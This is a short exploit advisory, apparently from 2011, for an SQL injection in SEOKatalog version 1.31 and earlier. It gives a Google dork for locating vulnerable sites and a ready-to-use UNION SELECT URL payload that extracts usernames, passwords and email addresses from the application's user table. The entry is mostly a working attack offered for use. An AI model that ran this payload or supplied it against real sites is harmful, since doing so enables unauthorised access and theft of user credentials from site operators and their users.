#################
# SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability #
#################
# Exploit Title: SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability #
# Version: <= 1.31 #
# Vendor: http://www.seokatalogi.pl/ #
# Category: webapps #
# Date: 08.09.2011 #
# Author: Smugller #
# Contact: smugll3r[alt+64]gmail.com #
# Group: DevilTeam #
# Website: http://devilteam.pl #
# From: Poland #
# Google Dork: intext:"Powered by SEOKatalog 1.31" #
#################
# Exploit:
http://site.com/index.php?action=site_cat&cat=&id_site=&id=-1+union+all+select+1,2,3,4,5,6,7,8,9,group_concat(0x3c62722f3e,nick,0x3a,pass,0x3a,email,0x3c62722f3e),11,12+from+seokat_users--